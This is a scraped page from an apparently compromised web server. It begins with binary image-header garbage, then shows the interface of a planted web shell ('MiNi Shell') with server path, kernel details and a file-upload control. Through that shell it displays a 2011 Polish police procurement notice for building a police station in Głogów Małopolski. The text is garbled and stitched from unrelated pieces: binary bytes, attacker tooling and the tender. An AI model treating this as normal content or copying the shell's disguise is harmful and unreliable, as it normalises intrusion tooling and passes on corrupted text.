JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110426/123457-N-2011.html

<p class="kh_header"><b>Rzeszów: Budowa Komisariatu Policji w Głogowie Małopolskim wraz z uzyskaniem pozwolenia na użytkowanie</b><br>
<b>Numer ogłoszenia: 123457 - 2011; data zamieszczenia: 26.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Dąbrowskiego 30, 35-036 Rzeszów, woj. podkarpackie, tel. 017 8582192, faks 017 8582193.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podkarpacka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Komisariatu Policji w Głogowie Małopolskim wraz z uzyskaniem pozwolenia na użytkowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Budowa budynku Komisariatu Policji w Głogowie Małopolskim, garażu, miejsca do mycia samochodów wraz z przyłączami: wodociągowym, kanalizacji sanitarnej, kanalizacji  deszczowej, drenażu, kanalizacji  teletechnicznej, oświetleniem terenu, zjazdem z drogi, zagospodarowaniem terenu wraz z uzyskaniem pozwolenia na użytkowanie.
2.Integralną częścią opisu przedmiotu zamówienia są: 
1)Projekt budowlany,
2)Projekt wykonawczy - Projekt zagospodarowania terenu,
3)Projekt wykonawczy - Architektura,
4)Projekt wykonawczy - Drogi, place, parkingi,
5)Projekt wykonawczy - Konstrukcja,
6)Projekt wykonawczy - Instalacje elektryczne,
7)Projekt wykonawczy-Instalacje elektryczne słaboprądowe(sygnalizacji pożaru, instalacja sieci  strukturalnej, telewizji przemysłowej CCTV, sygn. włamania 
i napadu oraz kontroli dostępu),
8)Projekt wykonawczy- przyłącz telekomunikacyjny,
9)Projekt wykonawczy- instalacje sanitarne ( wod.- kan., C.O., inst. gazowa., klimatyzacja, kotłownia gazowa),
10)Projekt wykonawczy-przyłącze wodociągowe, kanalizacji sanitarnej, kanalizacji deszczowej, drenażu opaskowego,
11)Specyfikacja techniczna wykonania i odbioru robót.

3.Okres rękojmi za wady wynosi 5 lat licząc od daty odbioru końcowego.

4. Jeżeli w jakimkolwiek miejscu w SIWZ oraz w załącznikach do niej tj. Projekcie budowlanym i wykonawczym - opisach technicznych i rysunkach, przedmiarach robót, Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy lub równoważne.

5.W przypadku zaoferowania produktów równoważnych konieczne będzie również uzyskanie przez Wykonawcę pisemnej akceptacji Projektanta, Zamawiającego oraz Wojewódzkiego Konserwatora Zabytków (w przypadku zmiany materiałów dotyczących elewacji)  na zastosowanie produktu równoważnego. 

6.Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa 
 w art. 67 ust. 1 pkt 6) ustawy
2.Wykonawca zobowiązuje się wykonać na odrębne zlecenie Zamawiającego roboty uzupełniające,  przy jednoczesnym zachowaniu tych samych norm, standardów i parametrów technicznych jak w przedmiocie umowy za dodatkowym wynagrodzeniem, które ustalone zgodnie z następującymi zasadami:
a)wartość robót nie może przekroczyć 50% wartości kwoty umownej, 
b)wynagrodzenie Wykonawcy za roboty ustalone będzie wg nakładów określonych  w KNR, KNNR, przy zastosowaniu stawek i wskaźników cenotwórczych określonych  w ofercie przetargowej,
c)koszty materiałów i sprzętu, w przypadku braku danych do wyceny w ofercie, zostaną ustalone na podstawie cen opublikowanych w kwartalniku Sekocenbud - ceny średnie z okresu wykonywania robót,
d)w przypadku braku cen na materiały i sprzęt w kwartalniku Sekocenbud- ceny zostaną ustalone na podstawie cen rynkowych w uzgodnieniu z Zamawiającym,
e)rozliczenie robót nastąpi na podstawie uzgodnionego protokołu konieczności       z kosztorysem sporządzonym według zasad określonych powyżej, po zawarciu odrębnej umowy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.11-5, 45.22.30.00-6, 45.40.00.00-1, 45.30.00.00-0, 45.11.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości  8 000 PLN.

2. Wadium może być wniesione w :
-pieniądzu   - wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
                NBP O/O w Rzeszowie nr 10 1010 1528 0004 0413 9120 0000.
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
kredytowej, z  tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy   z   dnia   9   listopada   2000   roku   o   utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

3. Wadium wnoszone w  innej   formie niż pieniężna należy zdeponować w kasie Komendy Wojewódzkiej  Policji  w Rzeszowie,   ul.  Dąbrowskiego   30,   budynek  A,   II   piętro.    Kasa czynna jest od poniedziałku do piątku w godz. od 10: 00 do 13:00. 

4. Wadium wnoszone w  formie poręczenia  i  gwarancji  musi  zawierać  stwierdzenie,  że na  pierwsze   pisemne   żądanie   Zamawiającego   wzywające   do   zapłaty   wadium,   zgodnie z   warunkami   przetargu,   następuje   jego   bezwarunkowa   wypłata   bez   jakichkolwiek zastrzeżeń.  Zamawiający   zatrzyma  wadium w  przypadku   zaistnienia   okoliczności   jego zatrzymania opisanych w art. 46 ust. 5 ustawy. Przy ustalaniu zaistnienia przesłanek z art. 46 ust. 4a ustawy Zamawiający będzie opierał się na opinii Urzędu Zamówień Publicznych, która jest udostępniona pod adresem: http://www.uzp.gov.pl/zagadnienia- merytoryczne/prawo- polskie/opinie prawne/aktualne/zatrzymanie -wadium. 

5. Wadium wnosi się przed upływem terminu składania ofert, tj. wadium musi być złożone lub wpłynąć   na   rachunek   Zamawiającego   przed   upływem  terminu   składania   ofert   i musi obejmować cały okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku do oferty należy załączyć oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełniania warunków udziału w postepowaniu zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku udziału w postępowaniu, jeżeli Wykonawca wykaże, że  wykonał zgodnie z zasadami sztuki budowlanej
   i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert  w  postępowaniu,   a   jeżeli   okres   prowadzenia   działalności   jest   krótszy  -  w tym okresie, przynajmniej jedną robotę budowlaną o wartości minimum 3 500 000,00 zł  brutto polegającą na budowie nowego obiektu - budynku użyteczności publicznej o powierzchni użytkowej nie mniejszej niż 500 m2 ,  podczas realizacji której wykonano roboty budowlano-montażowe wielobranżowe (w tym branża budowlana, sanitarna, elektryczna, drogowa, teletechniczna i inne).

Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów, zgodnie z formułą spełnia - nie spełnia
UWAGA!
Przez budynek użyteczności publicznej Zamawiający rozumie budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej i opieki socjalnej, obsługi bankowej, usług, poczty lub telekomunikacji oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny, z wyłączeniem: obiektów sportowych takich jak: boisko sportowe, basen, sala gimnastyczna, a także budynku kultu religijnego, handlu, gastronomii, turystyki, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku, do oferty należy załączyć oświadczenie o spełnianiu warunków udziału w postępowaniu, którego
wzór stanowi Załącznik nr 4 do SIWZ.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku udziału w postępowaniu, jeżeli Wykonawca wykaże, że:
- będzie dysponować podczas realizacji zamówienia kierownikiem budowy - osoba ta musi posiadać uprawnienia budowlane wykonawcze w specjalności konstrukcyjno - budowlanej  bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,  oraz  co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi i wykaże się pracą - w ciągu ostatnich 5 lat - na stanowisku kierownika budowy przy realizacji minimum jednego zadania o podobnym zakresie do przedmiotu zamówienia.
- będzie dysponować podczas realizacji zamówienia kierownikiem robót branży sanitarnej - osoba ta musi posiadać uprawnienia wykonawcze w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (sanitarnych) lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów oraz co najmniej 3-letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi w branży sanitarnej, 
- będzie dysponować podczas realizacji zamówienia kierownikiem robót branży elektrycznej - osoba ta musi posiadać uprawnienia budowlane wykonawcze 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
 i elektroenergetycznych lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów oraz co najmniej 3-letnie doświadczenie zawodowe 
w kierowaniu robotami budowlanymi w branży elektrycznej, 
- będzie dysponować podczas realizacji zamówienia kierownikiem robót branży drogowej - osoba ta musi posiadać uprawnienia budowlane wykonawcze 
w specjalności drogowej lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów oraz co najmniej 3-letnie doświadczenie zawodowe 
w kierowaniu robotami budowlanymi w branży drogowej,
- będzie dysponować podczas realizacji zamówienia kierownikiem robót branży telekomunikacyjnej - osoba ta musi posiadać uprawnienia budowlane 
w telekomunikacji do kierowania robotami budowlanymi w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz infrastrukturą towarzyszącą 
w zakresie linii, instalacji i urządzeń liniowych lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku udziału w postępowaniu, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 500 000,00 zł ( a w przypadku, jeżeli środki finansowe lub zdolność kredytowa jest wyrażona w walucie obcej - wyrażoną w złotych równowartość 500 000,00 zł  wg średniego kursu NBP z dnia wystawienia informacji banku potwierdzającej wysokość posiadania środków na rachunku lub zdolność kredytową Wykonawcy) oraz jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1 000 000,00 zł.

Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć uproszczony i szczegółowy kosztorys ofertowy przygotowany w oparciu o przedmiary robót i dokumentacje projektową po przeprowadzeniu wizji lokalnej placu budowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian w umowie w stosunku do treści oferty,  w przypadku zaistnienia co najmniej jednej  z okoliczności wymienionych poniżej:
1)wydłużenia terminu realizacji o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy w przypadku siły wyższej takiej jak katastrofa, zamieszki, pożar, trzęsienie ziemi, trąba powietrzna, powódź, jak również innych zdarzeń na które strony nie mają wpływu, lecz które utrudniają pełne lub częściowe wypełnienie zobowiązań umownych i których nie da się uniknąć nawet w przypadku zachowania maksymalnej staranności obu stron;
2)zmian kluczowych specjalistów:
a)na wniosek Wykonawcy z powodu:
- śmierci, choroby lub z powodu innych zdarzeń losowych dotyczących kluczowego specjalisty,
- nie wywiązywania się kluczowego specjalisty z obowiązków wynikających 
z umowy,
-jakichkolwiek innych przyczyn niezależnych od Wykonawcy ( np. rezygnacja itp.),
b)na żądanie Zamawiającego, jeżeli uzna, że kluczowy specjalista nie wykonuje swoich obowiązków wynikających z umowy; zmiany takiej Wykonawca winien dokonać w terminie wskazanym przez Zamawiającego.
3)Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego. Będą to np. okoliczności:
a)powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację
 i konserwację wykonanego przedmiotu umowy,
b)powodujące poprawienie parametrów technicznych,
c)wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
2.Zmiany, o których mowa  powyżej muszą być każdorazowo zatwierdzone przez Zamawiającego w porozumieniu z projektantem i nie będą one prowadziły do zwiększenia wynagrodzenia Wykonawcy.
3. Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie  pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.podkarpacka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Zamówień Publicznych i Funduszy Pomocowych,
Komenda Wojewódzka Policji w Rzeszowie,
ul. Dąbrowskiego 30,
35 - 036 Rzeszów,
budynek B, I piętro, pokój nr 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 12:00, miejsce: Zespół Zamówień Publicznych i Funduszy Pomocowych,
Komenda Wojewódzka Policji w Rzeszowie,
ul. Dąbrowskiego 30,
35 - 036 Rzeszów,
budynek B, I piętro, pokój nr 116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com